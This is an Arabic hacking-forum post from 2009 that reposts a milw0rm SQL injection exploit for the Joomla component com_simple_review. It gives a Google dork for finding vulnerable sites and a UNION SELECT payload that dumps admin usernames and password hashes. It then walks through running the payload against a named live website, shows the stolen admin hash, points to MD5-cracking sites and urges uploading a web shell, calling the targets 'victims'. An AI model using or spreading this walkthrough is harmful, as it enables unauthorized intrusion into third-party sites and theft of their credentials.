نـور المنتـدى بالعضـو الجـديـد محمد
 
الرئيسيةالبوابةس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول

شاطر | 
 

 ثغرة اليوم نزلت لحقوو

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
المدير العام
المدير العام


عدد الرسائل : 181
تاريخ التسجيل : 13/06/2008

مُساهمةموضوع: ثغرة اليوم نزلت لحقوو   الأربعاء يناير 21, 2009 2:33 pm

السلام عليكم ورحمة الله وبركاته

حبائبي أعضاء المنتدى

فاليوم قلت بروح أشوف أخر الثغرات فاوجدت لكم ثغره

مواقع كثيره م......


طبعا اليوم نزلت يعني بتلحق على ضحايا


كود PHP:
simple_review Sql injection#
########################################
#[~] Author : EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label Hippi Godlike Nitrous

#[!] Module_Name: com_simple_review
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_simple_review"
########################################

www.scriptpage.com/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--

<
name>simple_review</name>
<
creationDate>29/05/2006</creationDate>
<
author>Rowan Youngson</author>
<
copyright>This component in released under the Mozilla Public License Version 1.1</copyright>
<
authorEmail> rowans@gmail.com </authorEmail>

<
authorUrl>www.row1.info</authorUrl>
<
version>1.3.5</version>
<
description>Simple Review is a Review component for the Mambo CMS</description>

# milw0rm.com [2009-01-05]




شرح الثغرة






أبحث عن:

كود PHP:
inurl:"com_simple_review"



أوك حلو الحين فتح معنا وطلعت المواقع المصابه الحين أختر أي موقع ياحبيبي

طيب لنفترض أنك أخترات هذا الموقع

http://joomla.smartmobil.no

طيب الحين نبغي نحط الأ ستغلال كيف أناأقولك كيف

أول وين الأستغلال هذا هو


كود PHP:
index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--



طيب عرفنا الأستغلال طيب حلو الحين نجرب على موقعنا الي وجدناه

كيف نضع الأستغلال ؟؟

أقولك يالغالي كيف يابعدي

هذا موقعنا المراد أختراقه
http://joomla.smartmobil.no

أوك نضع الأستغلال بعد رابط المواقع كذا بيكون


كود PHP:
http://joomla.smartmobil.no/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--






طيب نشوف يطلع لنا الباسورد ولا مرقع الثغره الموقع يلا خلونا نشوف



لووووووووووووووووووووووول طلع لنا الباسورد واليزور





هذا اليوزر :

admin


هذا الباسورد


f372d16df9f2e7a8ab91cc92b662e2a7


لكن الباسورد مشفر



لكن ولا يهمك نجيبه نجيبه ننط لموقع مليروم



من هنا


http://www.milw0rm.com/cracker/insert.php


أو هذا الموقع


http://md5.rednoize.com/



وونضع الهاش حقنا وننتضر لين ينفك الهاش وأذا انفك أدخل على الموقع وأرفع شيل وأدعس عليه


الشرح منقول من الأخ AzoZ

Arrow
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://almo7b.yoo7.com
 
ثغرة اليوم نزلت لحقوو
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات بحر العذااب :: عالم الاتصالات والكمبيوتر :: عالم الهكررررز-
انتقل الى: